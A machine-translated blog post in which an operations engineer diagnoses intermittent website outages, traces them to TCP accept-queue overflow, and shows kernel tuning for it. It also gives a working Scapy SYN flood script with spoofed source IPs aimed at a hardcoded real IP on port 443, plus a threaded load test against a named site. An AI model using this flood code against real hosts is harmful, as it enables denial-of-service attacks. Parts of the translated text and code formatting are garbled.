Python Chinese Community The spiritual tribe of Python Chinese developers around the world
Author: Liu Xiaoming, head of operation and maintenance technology of Internet company, has 10 years of experience in Internet development and operation. It has been committed to the development of operation and maintenance tools and the promotion of operation and maintenance expert services, enabling development and improving efficiency.
* * * *
Problem Description:
1. The monitoring system finds that the home page and other pages of the e-commerce website are intermittently inaccessible;
2. Check that security protection, network traffic, and application system load are normal.
3. After the system restarts, the problem can be solved temporarily, but the intermittent problem occurs again after a period of time.
At this time the problem has affected the normal business of the entire website, my heart is scared of ah, the main alarm system has no alarm, the service runs everything normally, instantaneous back sweat has come out. But still want to calm, to carefully look for clues, step by step to find the problem.
Preliminary judgment of the problem:
1. Check whether there is error and DROP in the DEV and NIC device layers
Cat /proc/net/dev and ifconfig. No exception is found at the hardware and system layers
Check socket overflow and socket droped. If syn queue overflows socket overflow, the syn queue overflows socket dropped.
Netstat -s | grep -i listen, found the SYN socket overflow and socket droped sharp increase.
3. Check sySCTL kernel parameters: backlog, Somaxconn, file-max and application backlog
In ss-lnt query, send-q takes the minimum value of the preceding parameter and finds that the number of queues exceeds the default values of port 80 and port 443
4. Check whether Selinux and NetworkManager are enabled and whether they are disabled
5. Check whether timestap,reuse is enabled. If NAT is enabled, recycle is disabled
6. Determine the application processing after the request is captured and whether the SYN is not responded to.
In-depth analysis of the problem:
Normal three-way TCP connection handshake:
- Step 1: The client sends a SYN to the server to initiate a handshake.
- Step 2: The server replies with SYN + ACK to the client.
- Step 3: After receiving a SYN + ACK, the client replies with an ACK indicating that it has received a SYN + ACK from the server.
The accept queue was full when the TCP connection was established. Once again learning map flowed more and more, it is clear that the fully connected queue must have overflowed on server.
Then check how the OS handles the overflow:
Copy the code
# cat /proc/sys/net/ipv4/tcp_abort_on_overflow
- ` `
0
Tcpaborton_overflow 0 means that if the full connection queue is full at step 3 of the three-way handshake, the server will throw away the ACK sent by the client.
In order to prove that the client application code exception is related to the full connection queue, I changed tcpaborton_overflow to 1,1, which means that in step 3, if the full connection queue is full, the server sends a reset packet to the client. Discards the handshake and the connection (which was not established on the server).
Then test and see a lot of connection reset by peer errors in the web service log exception to prove that the client error is due to this reason.
For sysctl kernel parameters: backlog, somaxconn, file-max and nginx, ss-ln is the minimum value, 128, resV -q is 129, the request was discarded. Modify and optimize the above parameters:
- Linux kernel parameter optimization:
Copy the code
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 16384
net.core.somaxconn = 16384
- Backlog =32768;
No new problems found using Python multithreaded pressure test:
Copy the code
import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
url='https://www.wuage.com/'
response=requests.get(url)
soup=BeautifulSoup(response.text,'html.parser')
with ThreadPoolExecutor(20) as ex:
for each_a_tag in soup.find_all('a'):
try:
ex.submit(requests.get,each_a_tag['href'])
except Exception as err:
print('return error msg:'+str(err))
Understand the flow and queue of establishing a connection during the TCP handshake
As shown in the figure above, there are two queues: syns Queue (half-connected queue); Accept queue (full connection queue)
In the three-way handshake, after the server receives a SYN from the client, the server puts the information in the half-connection queue and replies with a SYN + ACK (Step 2).
For example, the syn floods attack is aimed at the half-connected queue. The attacker keeps establishing connections, but only does the first step when establishing connections. In the second step, the attacker deliberately removes the syn+ ACK from the server and does nothing, so that the queue on the server is full of other normal requests
In the third step, the server receives the ACK from the client. If the full connection queue is not full, the server takes out the related information from the half-connection queue and puts it into the full connection queue. Otherwise, the server executes the tcpaborton_overflow instruction.
If the queue is full and tcpaborton_overflow is 0, the server sends a SYN + ACK to the client after a certain period of time. If the client timeout wait is short, the exception is likely.
SYN Flood Flood attacks
One of the most popular forms of DoS (denial of service attacks) and DDoS (distributed denial of Service attacks) is a TCP flaw that causes the attacked server to maintain a “half-connection” with a lot of SYN_RECV state and to retry the second handshake packet by default five times, filling the TCP waiting queue. Resource exhaustion (full CPU load or insufficient memory) prevents normal business requests from connecting. SYN Flood attack in Python
Copy the code
from concurrent.futures import ThreadPoolExecutor
from scapy.all import *
def synFlood(tgt,dPort):
SrcList = [' 11.1.1.2 ', '22.1.1.102', '33.1.1.2',
'125.130.5.199]
for sPort in range(1024, 65535):
index = random.randrange(4)
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort,flags='S')
packet = ipLayer/tcpLayer
send(packet)
- ` `
The TGT = '139.196.251.198'
print(tgt)
dPort = 443
- ` `
with ThreadPoolExecutor(10000000) as ex:
try:
ex.submit(synFlood(tgt,dPort))
except Exception as err:
print('return error msg:' + str(err))
So everyone to TCP connection queue and the connection queue problems easily overlooked, but essential, especially for some short connection application problems, after the outbreak of easier, from network traffic, CPU, thread, load is normal, the client look at rt is higher, and it’s short but judging from the server-side log rt. How to avoid being in a hurry when there is a problem, establish an emergency machine mechanism, and then have the opportunity to write an emergency article.
Recent Hot articles
Learn more about wechat friends \ with Python
How to be a dirty programmer in Python \
New discovery of using Python to crawl 100,000 comments on Eason Chan’s new song “We” \
Using Python to analyze Apple stock price data \
Python Natural Language Processing analysis of heaven and dragon
Click **** to read the original article and become a free member of **** community